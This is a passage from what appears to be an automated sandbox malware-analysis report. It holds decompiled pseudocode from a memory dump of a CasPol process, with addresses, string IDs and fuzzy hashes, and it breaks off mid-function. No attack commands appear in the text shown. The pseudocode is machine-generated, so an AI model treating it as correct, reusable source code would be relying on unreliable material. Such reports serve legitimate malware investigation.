                                                                                                                                                                                                                                                                                                0x0175fcd5
                                                                                                                                                                                                                                                                                                0x0175fc89
                                                                                                                                                                                                                                                                                                0x0175fc89
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0175fc9f
                                                                                                                                                                                                                                                                                                0x0175fc9f
                                                                                                                                                                                                                                                                                                0x0175fca3
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0175fca3
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0175fbe4
                                                                                                                                                                                                                                                                                                0x0175fbe4
                                                                                                                                                                                                                                                                                                0x0175fbe4
                                                                                                                                                                                                                                                                                                0x0175fbe4
                                                                                                                                                                                                                                                                                                0x0175fbe9
                                                                                                                                                                                                                                                                                                0x0175fbf2
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0175fbf2
                                                                                                                                                                                                                                                                                                0x0175fbde
                                                                                                                                                                                                                                                                                                0x0175fbcb
                                                                                                                                                                                                                                                                                                0x0175fbab
                                                                                                                                                                                                                                                                                                0x0175fc8b
                                                                                                                                                                                                                                                                                                0x0175fc8b
                                                                                                                                                                                                                                                                                                0x0175fc8c
                                                                                                                                                                                                                                                                                                0x0175fb80
                                                                                                                                                                                                                                                                                                0x0175fb72
                                                                                                                                                                                                                                                                                                0x0175fb5e
                                                                                                                                                                                                                                                                                                0x0175fc8d
                                                                                                                                                                                                                                                                                                0x0175fc91
                                                                                                                                                                                                                                                                                                0x0175fadf
                                                                                                                                                                                                                                                                                                0x0175fadf
                                                                                                                                                                                                                                                                                                0x0175fae1
                                                                                                                                                                                                                                                                                                0x0175fae4
                                                                                                                                                                                                                                                                                                0x0175fae7
                                                                                                                                                                                                                                                                                                0x0175faec
                                                                                                                                                                                                                                                                                                0x0175faf8
                                                                                                                                                                                                                                                                                                0x0175fb00
                                                                                                                                                                                                                                                                                                0x0175fb07
                                                                                                                                                                                                                                                                                                0x0175fb0f
                                                                                                                                                                                                                                                                                                0x0175fb0f
                                                                                                                                                                                                                                                                                                0x0175fb07
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0175faf8
                                                                                                                                                                                                                                                                                                0x0175fadd

                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0179BE0F
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                                                                                                                                                                                                                                                                • API String ID: 0-865735534
                                                                                                                                                                                                                                                                                                • Opcode ID: d022d26c7f2b5f05123d5ab79915d51a73538b2489f742e3d93191b33f22b87e
                                                                                                                                                                                                                                                                                                • Instruction ID: bafb06eca7424d25b1e5ab459e3d825c88cb07c524a2e76ed75b1cc8c0c4f4a7
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d022d26c7f2b5f05123d5ab79915d51a73538b2489f742e3d93191b33f22b87e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A7A12171B00606CBEB66DB68D454B7AF7A9AF48710F04457EEE06CB681DBB0D845CB90
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                C-Code - Quality: 75%
                                                                                                                                                                                                                                                                                                			E0175F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
                                                                                                                                                                                                                                                                                                				intOrPtr _v8;
                                                                                                                                                                                                                                                                                                				intOrPtr _v12;
                                                                                                                                                                                                                                                                                                				intOrPtr _v16;
                                                                                                                                                                                                                                                                                                				char* _v20;
                                                                                                                                                                                                                                                                                                				intOrPtr _v24;
                                                                                                                                                                                                                                                                                                				char _v28;
                                                                                                                                                                                                                                                                                                				intOrPtr _v32;
                                                                                                                                                                                                                                                                                                				char _v36;
                                                                                                                                                                                                                                                                                                				char _v44;
                                                                                                                                                                                                                                                                                                				char _v52;
                                                                                                                                                                                                                                                                                                				intOrPtr _v56;
                                                                                                                                                                                                                                                                                                				char _v60;
                                                                                                                                                                                                                                                                                                				intOrPtr _v72;
                                                                                                                                                                                                                                                                                                				void* _t51;
                                                                                                                                                                                                                                                                                                				void* _t58;
                                                                                                                                                                                                                                                                                                				signed short _t82;
                                                                                                                                                                                                                                                                                                				short _t84;
                                                                                                                                                                                                                                                                                                				signed int _t91;
                                                                                                                                                                                                                                                                                                				signed int _t100;
                                                                                                                                                                                                                                                                                                				signed short* _t103;
	void* _t108;
	intOrPtr* _t109;

	_t103 = __ecx;
	_t82 = __edx;
	_t51 = E01744120(0, __ecx, 0,  &_v52, 0, 0, 0);
	if(_t51 >= 0) {
		_push(0x21);
		_push(3);
		_v56 =  *0x7ffe02dc;
		_v20 =  &_v52;
		_push( &_v44);
		_v28 = 0x18;
		_push( &_v28);
		_push(0x100020);
		_v24 = 0;
		_push( &_v60);
		_v16 = 0x40;
		_v12 = 0;
		_v8 = 0;
		_t58 = E01769830();
		_t87 =  *[fs:0x30];
		_t108 = _t58;
		L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
		if(_t108 < 0) {
			L11:
			_t51 = _t108;
		} else {
			_push(4);
			_push(8);
			_push( &_v36);
			_push( &_v44);
			_push(_v60);
			_t108 = E01769990();
			if(_t108 < 0) {
				L10:
				_push(_v60);
				E017695D0();
				goto L11;
			} else {
				_t109 = L01744620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
				if(_t109 == 0) {
					_t108 = 0xc0000017;
					goto L10;
				} else {
					_t21 = _t109 + 0x18; // 0x18
					 *((intOrPtr*)(_t109 + 4)) = _v60;
					 *_t109 = 1;
					 *((intOrPtr*)(_t109 + 0x10)) = _t21;
					 *(_t109 + 0xe) = _t82;
					 *((intOrPtr*)(_t109 + 8)) = _v56;
					 *((intOrPtr*)(_t109 + 0x14)) = _v32;
					E0176F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
					 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
					 *((short*)(_t109 + 0xc)) =  *_t103;
					_t91 =  *_t103 & 0x0000ffff;
					_t100 = _t91 & 0xfffffffe;
					_t84 = 0x5c;
					if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
						if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
							_push(_v60);
							E017695D0();
							L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
							_t51 = 0xc0000106;
						} else {
							 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
							 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
							 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
							goto L5;
						}
					} else {
						L5:
						 *_a4 = _t109;
						_t51 = 0;
					}
				}
			}
		}
	}
	return _t51;
}

























                                                                                                                                                                                                                                                                                                0x0175f179
                                                                                                                                                                                                                                                                                                0x0175f18d
                                                                                                                                                                                                                                                                                                0x0175f191
                                                                                                                                                                                                                                                                                                0x0179baa2
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0175f197
                                                                                                                                                                                                                                                                                                0x0175f19b
                                                                                                                                                                                                                                                                                                0x0175f1a2
                                                                                                                                                                                                                                                                                                0x0175f1a9
                                                                                                                                                                                                                                                                                                0x0175f1af
                                                                                                                                                                                                                                                                                                0x0175f1b2
                                                                                                                                                                                                                                                                                                0x0175f1b6
                                                                                                                                                                                                                                                                                                0x0175f1b9
                                                                                                                                                                                                                                                                                                0x0175f1c4
                                                                                                                                                                                                                                                                                                0x0175f1d8
                                                                                                                                                                                                                                                                                                0x0175f1df
                                                                                                                                                                                                                                                                                                0x0175f1e3
                                                                                                                                                                                                                                                                                                0x0175f1eb
                                                                                                                                                                                                                                                                                                0x0175f1ee
                                                                                                                                                                                                                                                                                                0x0175f1f4
                                                                                                                                                                                                                                                                                                0x0175f20f
                                                                                                                                                                                                                                                                                                0x0179bab7
                                                                                                                                                                                                                                                                                                0x0179babb
                                                                                                                                                                                                                                                                                                0x0179bacc
                                                                                                                                                                                                                                                                                                0x0179bad1
                                                                                                                                                                                                                                                                                                0x0175f215
                                                                                                                                                                                                                                                                                                0x0175f218
                                                                                                                                                                                                                                                                                                0x0175f226
                                                                                                                                                                                                                                                                                                0x0175f22b
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0175f22b
                                                                                                                                                                                                                                                                                                0x0175f1f6
                                                                                                                                                                                                                                                                                                0x0175f1f6
                                                                                                                                                                                                                                                                                                0x0175f1f9
                                                                                                                                                                                                                                                                                                0x0175f1fb
                                                                                                                                                                                                                                                                                                0x0175f1fb
                                                                                                                                                                                                                                                                                                0x0175f1f4
                                                                                                                                                                                                                                                                                                0x0175f191
                                                                                                                                                                                                                                                                                                0x0175f173
                                                                                                                                                                                                                                                                                                0x0175f152
                                                                                                                                                                                                                                                                                                0x0175f203

Strings
Memory Dump Source
• Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
Similarity
• API ID:
• String ID: @
• API String ID: 0-2766056989
• Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
• Instruction ID: 2a84a962c915fffa03329b69f4511eb9490debe772323dbad7c7018630595a99
• Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
• Instruction Fuzzy Hash: B7517A71504711AFC321DF29C840A6BFBF8FF48750F00892AFA9597690E7B4E904CBA1
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 75%
                                                                                                                                                                                                                                                                                                			E017A3540(intOrPtr _a4) {
                                                                                                                                                                                                                                                                                                				signed int _v12;
                                                                                                                                                                                                                                                                                                				intOrPtr _v88;
                                                                                                                                                                                                                                                                                                				intOrPtr _v92;
                                                                                                                                                                                                                                                                                                				char _v96;
                                                                                                                                                                                                                                                                                                				char _v352;
                                                                                                                                                                                                                                                                                                				char _v1072;
                                                                                                                                                                                                                                                                                                				intOrPtr _v1140;
                                                                                                                                                                                                                                                                                                				intOrPtr _v1148;
                                                                                                                                                                                                                                                                                                				char _v1152;
                                                                                                                                                                                                                                                                                                				char _v1156;
                                                                                                                                                                                                                                                                                                				char _v1160;
                                                                                                                                                                                                                                                                                                				char _v1164;
                                                                                                                                                                                                                                                                                                				char _v1168;
                                                                                                                                                                                                                                                                                                				char* _v1172;
                                                                                                                                                                                                                                                                                                				short _v1174;
                                                                                                                                                                                                                                                                                                				char _v1176;
                                                                                                                                                                                                                                                                                                				char _v1180;
                                                                                                                                                                                                                                                                                                				char _v1192;
                                                                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                                                                				void* __ebp;
                                                                                                                                                                                                                                                                                                				short _t41;
                                                                                                                                                                                                                                                                                                				short _t42;
                                                                                                                                                                                                                                                                                                				intOrPtr _t80;
                                                                                                                                                                                                                                                                                                				intOrPtr _t81;
                                                                                                                                                                                                                                                                                                				signed int _t82;
                                                                                                                                                                                                                                                                                                				void* _t83;
                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                				_v12 =  *0x181d360 ^ _t82;
                                                                                                                                                                                                                                                                                                				_t41 = 0x14;
                                                                                                                                                                                                                                                                                                				_v1176 = _t41;
                                                                                                                                                                                                                                                                                                				_t42 = 0x16;
                                                                                                                                                                                                                                                                                                				_v1174 = _t42;
                                                                                                                                                                                                                                                                                                				_v1164 = 0x100;
                                                                                                                                                                                                                                                                                                				_v1172 = L"BinaryHash";
                                                                                                                                                                                                                                                                                                				_t81 = E01760BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
                                                                                                                                                                                                                                                                                                				if(_t81 < 0) {
                                                                                                                                                                                                                                                                                                					L11:
                                                                                                                                                                                                                                                                                                					_t75 = _t81;
                                                                                                                                                                                                                                                                                                					L017A3706(0, _t81, _t79, _t80);
                                                                                                                                                                                                                                                                                                					L12:
                                                                                                                                                                                                                                                                                                					if(_a4 != 0xc000047f) {
                                                                                                                                                                                                                                                                                                						E0176FA60( &_v1152, 0, 0x50);
                                                                                                                                                                                                                                                                                                						_v1152 = 0x60c201e;
                                                                                                                                                                                                                                                                                                						_v1148 = 1;
                                                                                                                                                                                                                                                                                                						_v1140 = E017A3540;
                                                                                                                                                                                                                                                                                                						E0176FA60( &_v1072, 0, 0x2cc);
                                                                                                                                                                                                                                                                                                						_push( &_v1072);
                                                                                                                                                                                                                                                                                                						L0177DDD0( &_v1072, _t75, _t79, _t80, _t81);
                                                                                                                                                                                                                                                                                                						L017B0C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
                                                                                                                                                                                                                                                                                                						_push(_v1152);
                                                                                                                                                                                                                                                                                                						_push(0xffffffff);
                                                                                                                                                                                                                                                                                                						L017697C0();
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                					return L0176B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                				_t79 =  &_v352;
                                                                                                                                                                                                                                                                                                				_t81 = E017A3971(0, _a4,  &_v352,  &_v1156);
                                                                                                                                                                                                                                                                                                				if(_t81 < 0) {
                                                                                                                                                                                                                                                                                                					goto L11;
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                				_t75 = _v1156;
                                                                                                                                                                                                                                                                                                				_t79 =  &_v1160;
                                                                                                                                                                                                                                                                                                				_t81 = E017A3884(_v1156,  &_v1160,  &_v1168);
                                                                                                                                                                                                                                                                                                				if(_t81 >= 0) {
                                                                                                                                                                                                                                                                                                					_t80 = _v1160;
                                                                                                                                                                                                                                                                                                					E0176FA60( &_v96, 0, 0x50);
                                                                                                                                                                                                                                                                                                					_t83 = _t83 + 0xc;
                                                                                                                                                                                                                                                                                                					_push( &_v1180);
                                                                                                                                                                                                                                                                                                					_push(0x50);
                                                                                                                                                                                                                                                                                                					_push( &_v96);
                                                                                                                                                                                                                                                                                                					_push(2);
                                                                                                                                                                                                                                                                                                					_push( &_v1176);
                                                                                                                                                                                                                                                                                                					_push(_v1156);
                                                                                                                                                                                                                                                                                                					_t81 = L01769650();
                                                                                                                                                                                                                                                                                                					if(_t81 >= 0) {
                                                                                                                                                                                                                                                                                                						if(_v92 != 3 || _v88 == 0) {
                                                                                                                                                                                                                                                                                                							_t81 = 0xc000090b;
                                                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                                                						if(_t81 >= 0) {
                                                                                                                                                                                                                                                                                                							_t75 = _a4;
                                                                                                                                                                                                                                                                                                							_t79 =  &_v352;
                                                                                                                                                                                                                                                                                                							L017A3787(_a4,  &_v352, _t80);
                                                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                					L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                				_push(_v1156);
                                                                                                                                                                                                                                                                                                				E017695D0();
                                                                                                                                                                                                                                                                                                				if(_t81 >= 0) {
                                                                                                                                                                                                                                                                                                					goto L12;
                                                                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                                                                					goto L11;
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                			}































                                                                                                                                                                                                                                                                                                0x017a3636
                                                                                                                                                                                                                                                                                                0x017a3657
                                                                                                                                                                                                                                                                                                0x017a3657
                                                                                                                                                                                                                                                                                                0x017a365c
                                                                                                                                                                                                                                                                                                0x017a3662
                                                                                                                                                                                                                                                                                                0x017a3669
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: BinaryHash
                                                                                                                                                                                                                                                                                                • API String ID: 0-2202222882
                                                                                                                                                                                                                                                                                                • Opcode ID: faa5a16faaeb684a8c6c1efcd7e896abf20b51b697e16a552a63180736c605a4
                                                                                                                                                                                                                                                                                                • Instruction ID: ae8190f2150caf97fa9b5e75254c166644f16a373bca5a5cba4de4491294d8e0
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: faa5a16faaeb684a8c6c1efcd7e896abf20b51b697e16a552a63180736c605a4
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F34122B2D0052DABDB21DE50CC85FEEF77CAB54714F5046A5EB09AB240DB309E888F95
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                C-Code - Quality: 72%
                                                                                                                                                                                                                                                                                                			E017A3884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                                                                                                                                                                                                                                                                                                				char _v8;
                                                                                                                                                                                                                                                                                                				intOrPtr _v12;
                                                                                                                                                                                                                                                                                                				intOrPtr* _v16;
                                                                                                                                                                                                                                                                                                				char* _v20;
                                                                                                                                                                                                                                                                                                				short _v22;
                                                                                                                                                                                                                                                                                                				char _v24;
                                                                                                                                                                                                                                                                                                				intOrPtr _t38;
                                                                                                                                                                                                                                                                                                				short _t40;
                                                                                                                                                                                                                                                                                                				short _t41;
                                                                                                                                                                                                                                                                                                				void* _t44;
                                                                                                                                                                                                                                                                                                				intOrPtr _t47;
                                                                                                                                                                                                                                                                                                				void* _t48;
                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                				_v16 = __edx;
                                                                                                                                                                                                                                                                                                				_t40 = 0x14;
                                                                                                                                                                                                                                                                                                				_v24 = _t40;
                                                                                                                                                                                                                                                                                                				_t41 = 0x16;
                                                                                                                                                                                                                                                                                                				_v22 = _t41;
                                                                                                                                                                                                                                                                                                				_t38 = 0;
                                                                                                                                                                                                                                                                                                				_v12 = __ecx;
                                                                                                                                                                                                                                                                                                				_push( &_v8);
                                                                                                                                                                                                                                                                                                				_push(0);
                                                                                                                                                                                                                                                                                                				_push(0);
                                                                                                                                                                                                                                                                                                				_push(2);
                                                                                                                                                                                                                                                                                                				_t43 =  &_v24;
                                                                                                                                                                                                                                                                                                				_v20 = L"BinaryName";
                                                                                                                                                                                                                                                                                                				_push( &_v24);
                                                                                                                                                                                                                                                                                                				_push(__ecx);
                                                                                                                                                                                                                                                                                                				_t47 = 0;
                                                                                                                                                                                                                                                                                                				_t48 = L01769650();
                                                                                                                                                                                                                                                                                                				if(_t48 >= 0) {
                                                                                                                                                                                                                                                                                                					_t48 = 0xc000090b;
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                				if(_t48 != 0xc0000023) {
                                                                                                                                                                                                                                                                                                					_t44 = 0;
                                                                                                                                                                                                                                                                                                					L13:
                                                                                                                                                                                                                                                                                                					if(_t48 < 0) {
                                                                                                                                                                                                                                                                                                						L16:
                                                                                                                                                                                                                                                                                                						if(_t47 != 0) {
                                                                                                                                                                                                                                                                                                							L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
                                                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                                                						L18:
                                                                                                                                                                                                                                                                                                						return _t48;
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                					 *_v16 = _t38;
                                                                                                                                                                                                                                                                                                					 *_a4 = _t47;
                                                                                                                                                                                                                                                                                                					goto L18;
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                				_t47 = L01744620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                                                                                                                                                                                                                                                                                                				if(_t47 != 0) {
                                                                                                                                                                                                                                                                                                					_push( &_v8);
                                                                                                                                                                                                                                                                                                					_push(_v8);
                                                                                                                                                                                                                                                                                                					_push(_t47);
                                                                                                                                                                                                                                                                                                					_push(2);
                                                                                                                                                                                                                                                                                                					_push( &_v24);
                                                                                                                                                                                                                                                                                                					_push(_v12);
                                                                                                                                                                                                                                                                                                					_t48 = L01769650();
                                                                                                                                                                                                                                                                                                					if(_t48 < 0) {
                                                                                                                                                                                                                                                                                                						_t44 = 0;
                                                                                                                                                                                                                                                                                                						goto L16;
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
                                                                                                                                                                                                                                                                                                						_t48 = 0xc000090b;
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                					_t44 = 0;
                                                                                                                                                                                                                                                                                                					if(_t48 < 0) {
                                                                                                                                                                                                                                                                                                						goto L16;
                                                                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                                                                						_t17 = _t47 + 0xc; // 0xc
                                                                                                                                                                                                                                                                                                						_t38 = _t17;
                                                                                                                                                                                                                                                                                                						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
                                                                                                                                                                                                                                                                                                							_t48 = 0xc000090b;
                                                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                                                						goto L13;
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                				_t48 = _t48 + 0xfffffff4;
                                                                                                                                                                                                                                                                                                				goto L18;
                                                                                                                                                                                                                                                                                                			}
















                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: BinaryName
                                                                                                                                                                                                                                                                                                • API String ID: 0-215506332
                                                                                                                                                                                                                                                                                                • Opcode ID: f1d49c8e4054a5e93462175e9fb768941830edc43daeb81b6cd8699c7f4f153c
                                                                                                                                                                                                                                                                                                • Instruction ID: ff5c0280cf4c4ef7056b4e6361770a068e088ed3323ac48ae26c112b272c7cc5
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f1d49c8e4054a5e93462175e9fb768941830edc43daeb81b6cd8699c7f4f153c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1D31E33290061ABFEB16DE58C945E6BFB74FB80B28F514269EA15A7290D7309E04C7A1
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                C-Code - Quality: 33%
                                                                                                                                                                                                                                                                                                			E0175D294(void* __ecx, char __edx, void* __eflags) {
                                                                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                                                                				char _v52;
                                                                                                                                                                                                                                                                                                				signed int _v56;
                                                                                                                                                                                                                                                                                                				signed int _v60;
                                                                                                                                                                                                                                                                                                				intOrPtr _v64;
                                                                                                                                                                                                                                                                                                				char* _v68;
                                                                                                                                                                                                                                                                                                				intOrPtr _v72;
                                                                                                                                                                                                                                                                                                				char _v76;
                                                                                                                                                                                                                                                                                                				signed int _v84;
                                                                                                                                                                                                                                                                                                				intOrPtr _v88;
                                                                                                                                                                                                                                                                                                				char _v92;
                                                                                                                                                                                                                                                                                                				intOrPtr _v96;
                                                                                                                                                                                                                                                                                                				intOrPtr _v100;
                                                                                                                                                                                                                                                                                                				char _v104;
                                                                                                                                                                                                                                                                                                				char _v105;
                                                                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                                                                				signed int _t35;
                                                                                                                                                                                                                                                                                                				char _t38;
                                                                                                                                                                                                                                                                                                				signed int _t40;
                                                                                                                                                                                                                                                                                                				signed int _t44;
                                                                                                                                                                                                                                                                                                				signed int _t52;
                                                                                                                                                                                                                                                                                                				void* _t53;
                                                                                                                                                                                                                                                                                                				void* _t55;
                                                                                                                                                                                                                                                                                                				void* _t61;
                                                                                                                                                                                                                                                                                                				intOrPtr _t62;
                                                                                                                                                                                                                                                                                                				void* _t64;
                                                                                                                                                                                                                                                                                                				signed int _t65;
                                                                                                                                                                                                                                                                                                				signed int _t66;
                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                				_t68 = (_t66 & 0xfffffff8) - 0x6c;
                                                                                                                                                                                                                                                                                                				_v8 =  *0x181d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
                                                                                                                                                                                                                                                                                                				_v105 = __edx;
                                                                                                                                                                                                                                                                                                				_push( &_v92);
                                                                                                                                                                                                                                                                                                				_t52 = 0;
                                                                                                                                                                                                                                                                                                				_push(0);
                                                                                                                                                                                                                                                                                                				_push(0);
                                                                                                                                                                                                                                                                                                				_push( &_v104);
                                                                                                                                                                                                                                                                                                				_push(0);
                                                                                                                                                                                                                                                                                                				_t59 = __ecx;
                                                                                                                                                                                                                                                                                                				_t55 = 2;
                                                                                                                                                                                                                                                                                                				if(E01744120(_t55, __ecx) < 0) {
                                                                                                                                                                                                                                                                                                					_t35 = 0;
                                                                                                                                                                                                                                                                                                					L8:
                                                                                                                                                                                                                                                                                                					_pop(_t61);
                                                                                                                                                                                                                                                                                                					_pop(_t64);
                                                                                                                                                                                                                                                                                                					_pop(_t53);
                                                                                                                                                                                                                                                                                                					return L0176B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                				_v96 = _v100;
                                                                                                                                                                                                                                                                                                				_t38 = _v92;
                                                                                                                                                                                                                                                                                                				if(_t38 != 0) {
                                                                                                                                                                                                                                                                                                					_v104 = _t38;
                                                                                                                                                                                                                                                                                                					_v100 = _v88;
                                                                                                                                                                                                                                                                                                					_t40 = _v84;
                                                                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                                                                					_t40 = 0;
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                				_v72 = _t40;
                                                                                                                                                                                                                                                                                                				_v68 =  &_v104;
                                                                                                                                                                                                                                                                                                				_push( &_v52);
                                                                                                                                                                                                                                                                                                				_v76 = 0x18;
                                                                                                                                                                                                                                                                                                				_push( &_v76);
                                                                                                                                                                                                                                                                                                				_v64 = 0x40;
                                                                                                                                                                                                                                                                                                				_v60 = _t52;
                                                                                                                                                                                                                                                                                                				_v56 = _t52;
                                                                                                                                                                                                                                                                                                				_t44 = E017698D0();
                                                                                                                                                                                                                                                                                                				_t62 = _v88;
                                                                                                                                                                                                                                                                                                				_t65 = _t44;
                                                                                                                                                                                                                                                                                                				if(_t62 != 0) {
                                                                                                                                                                                                                                                                                                					asm("lock xadd [edi], eax");
                                                                                                                                                                                                                                                                                                					if((_t44 | 0xffffffff) != 0) {
                                                                                                                                                                                                                                                                                                						goto L4;
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                					_push( *((intOrPtr*)(_t62 + 4)));
                                                                                                                                                                                                                                                                                                					E017695D0();
                                                                                                                                                                                                                                                                                                					L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
                                                                                                                                                                                                                                                                                                					goto L4;
                                                                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                                                                					L4:
                                                                                                                                                                                                                                                                                                					L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
                                                                                                                                                                                                                                                                                                					if(_t65 >= 0) {
                                                                                                                                                                                                                                                                                                						_t52 = 1;
                                                                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                                                                						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
